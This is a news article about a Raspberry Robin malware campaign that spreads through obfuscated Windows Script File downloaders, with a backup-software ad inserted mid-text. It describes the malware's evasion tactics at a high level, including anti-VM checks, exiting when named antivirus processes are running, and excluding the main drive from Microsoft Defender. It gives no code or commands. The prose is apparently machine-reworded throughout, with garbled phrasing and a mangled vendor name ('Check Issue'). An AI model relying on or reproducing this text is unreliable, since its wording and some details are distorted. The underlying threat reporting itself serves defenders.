Cybersecurity researchers have identified a new Raspberry Robin campaign wave that propagates the malware by means of destructive Windows Script Files (WSFs) considering the fact that March 2024.
“Traditionally, Raspberry Robin was acknowledged to spread via detachable media like USB drives, but more than time its distributors have experimented with other initial infection vectors,” HP Wolf Security reported in a report shared with The Hacker News.
Raspberry Robin, also called QNAP worm, was first spotted in September 2021 that has given that advanced into a downloader for various other payloads in current many years, this sort of as SocGholish, Cobalt Strike, IcedID, BumbleBee, and TrueBot, and also serving as a precursor for ransomware.
Protect and backup your data using AOMEI Backupper. AOMEI Backupper takes secure and encrypted backups from your Windows, hard drives or partitions. With AOMEI Backupper you will never be worried about loosing your data anymore.
Get AOMEI Backupper with 72% discount from an authorized distrinutor of AOMEI: SerialCart® (Limited Offer).
➤ Activate Your Coupon Code
Whilst the malware was at first dispersed by signifies of USB gadgets made up of LNK data files that retrieved the payload from a compromised QNAP machine, it has considering that adopted other methods this sort of as social engineering and malvertising.
It can be attributed to an emerging menace cluster tracked by Microsoft as Storm-0856, which has hyperlinks to the broader cybercrime ecosystem comprising teams like Evil Corp, Silence, and TA505.
The hottest distribution vector involves the use of WSF information that are presented for download through several domains and subdomains.
It really is currently not very clear how the attackers are directing victims to these URLs, whilst it really is suspected that it could be both by using spam or malvertising campaigns.
The greatly obfuscated WSF file functions as a downloader to retrieve the major DLL payload from a remote server applying the curl command, but not just before a collection of anti-evaluation and anti-virtual device evaluations are carried out to identify if it is staying run in a virtualized ecosystem.
It truly is also intended to terminate the execution if the develop number of the Windows functioning procedure is reduce than 17063 (which was launched in December 2017) and if the record of operating processes includes antivirus processes associated with Avast, Avira, Bitdefender, Check Issue, ESET, and Kaspersky.
What’s much more, it configures Microsoft Defender Antivirus exclusion policies in an energy to sidestep detection by including the complete primary generate to the exclusion listing and blocking it from currently being scanned.
“The scripts by itself are at present not categorised as destructive by any an-virus scanners on VirusTotal, demonstrating the evasiveness of the malware and the risk of it creating a significant infection with Raspberry Robin,” HP mentioned.
“The WSF downloader is greatly obfuscated and works by using several an-investigation procedures enabling the malware to evade detection and slow down evaluation.”
Discovered this report exciting? Abide by us on Twitter and LinkedIn to go through more unique content we post.
Some components of this post are sourced from:
thehackernews.com